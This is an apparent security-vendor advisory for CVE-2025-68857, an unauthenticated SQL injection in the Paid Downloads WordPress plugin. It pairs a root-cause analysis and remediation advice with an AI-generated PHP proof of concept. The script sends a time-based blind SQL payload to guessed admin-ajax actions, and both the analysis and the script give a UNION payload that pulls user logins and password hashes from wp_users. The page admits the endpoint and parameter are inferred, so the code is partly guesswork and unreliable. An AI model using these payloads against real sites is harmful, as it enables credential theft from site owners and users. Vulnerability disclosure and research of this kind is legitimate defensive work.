Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-68857: Paid Downloads <= 3.15 – Unauthenticated SQL Injection (paid-downloads)

CVE ID CVE-2025-68857
Plugin paid-downloads
Severity High (CVSS 7.5)
CWE 89
Vulnerable Version 3.15
Patched Version
Disclosed January 20, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68857 (metadata-based):
The Paid Downloads WordPress plugin, version 3.15 and earlier, contains an unauthenticated SQL injection vulnerability. This flaw allows remote attackers to execute arbitrary SQL commands against the WordPress database. The vulnerability stems from insufficient input sanitization in a plugin endpoint, enabling data extraction without authentication.

Atomic Edge research infers the root cause is improper neutralization of user-supplied parameters within an SQL query, consistent with CWE-89. The description cites insufficient escaping and lack of query preparation. This indicates the plugin likely constructs SQL statements by directly concatenating user input into query strings without using prepared statements via `$wpdb->prepare()`. The vulnerable code path is likely an AJAX handler or a public-facing shortcode handler that processes user input for database operations.

The exploitation vector is an unauthenticated HTTP request to a plugin endpoint. Based on WordPress plugin patterns, the likely target is the `/wp-admin/admin-ajax.php` script with an `action` parameter corresponding to a plugin hook, such as `paid_downloads_action`. An attacker would send a POST or GET request containing a malicious SQL payload in a vulnerable parameter. A typical payload would use UNION-based injection to extract data from the `wp_users` table, such as `’ UNION SELECT user_login,user_pass FROM wp_users–`. The attack requires no authentication or nonce.

Remediation requires implementing proper input validation and using prepared statements. The fix should replace direct string concatenation in SQL queries with the WordPress `$wpdb->prepare()` method. All user-supplied parameters must be properly escaped or cast to expected types. The plugin should also implement capability checks for any administrative actions and nonce verification for state-changing operations, though these would not directly prevent the SQL injection described.

Successful exploitation leads to full compromise of database confidentiality. Attackers can extract sensitive information including user credentials (hashed passwords), personal data, payment records, and download transaction logs. This data breach can facilitate further attacks like password cracking or privilege escalation. The CVSS vector indicates high confidentiality impact (C:H) with no integrity or availability impact, aligning with an information disclosure vulnerability.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-68857 - Paid Downloads <= 3.15 - Unauthenticated SQL Injection
<?php
/**
 * Proof of Concept for CVE-2025-68857.
 * This script demonstrates unauthenticated SQL injection in the Paid Downloads plugin.
 * The exact vulnerable endpoint and parameter are inferred from WordPress plugin patterns.
 * Assumptions:
 * 1. The vulnerability exists in an AJAX handler accessible via admin-ajax.php.
 * 2. The 'action' parameter hook contains 'paid_downloads'.
 * 3. A user-controlled parameter is concatenated into an SQL query.
 */

$target_url = 'http://vulnerable-site.com/wp-admin/admin-ajax.php'; // CHANGE THIS

// Common AJAX action names for the Paid Downloads plugin
$possible_actions = [
    'paid_downloads_get_file',
    'paid_downloads_process',
    'paid_downloads_action',
    'paid_downloads_ajax_handler'
];

// SQL injection payload to extract database version (proof-of-concept)
// Using time-based blind injection to avoid excessive data output in initial testing
$sql_payload = "' OR IF(SUBSTRING(@@version,1,1)='5',SLEEP(5),0)--";

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

foreach ($possible_actions as $action) {
    $post_data = [
        'action' => $action,
        'id' => $sql_payload, // Assuming 'id' is a vulnerable parameter
        'nonce' => '' // Vulnerability may not require a nonce
    ];
    
    curl_setopt($ch, CURLOPT_URL, $target_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
    
    $start_time = microtime(true);
    $response = curl_exec($ch);
    $end_time = microtime(true);
    
    $response_time = $end_time - $start_time;
    
    if ($response_time > 4.9) {
        echo "[+] Potential SQL Injection found via action: $actionn";
        echo "    Response delayed by {$response_time} secondsn";
        echo "    Confirm with: ' UNION SELECT user_login,user_pass FROM wp_users--n";
        break;
    } else {
        echo "[-] No injection via action: $action (response time: {$response_time}s)n";
    }
}

curl_close($ch);
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School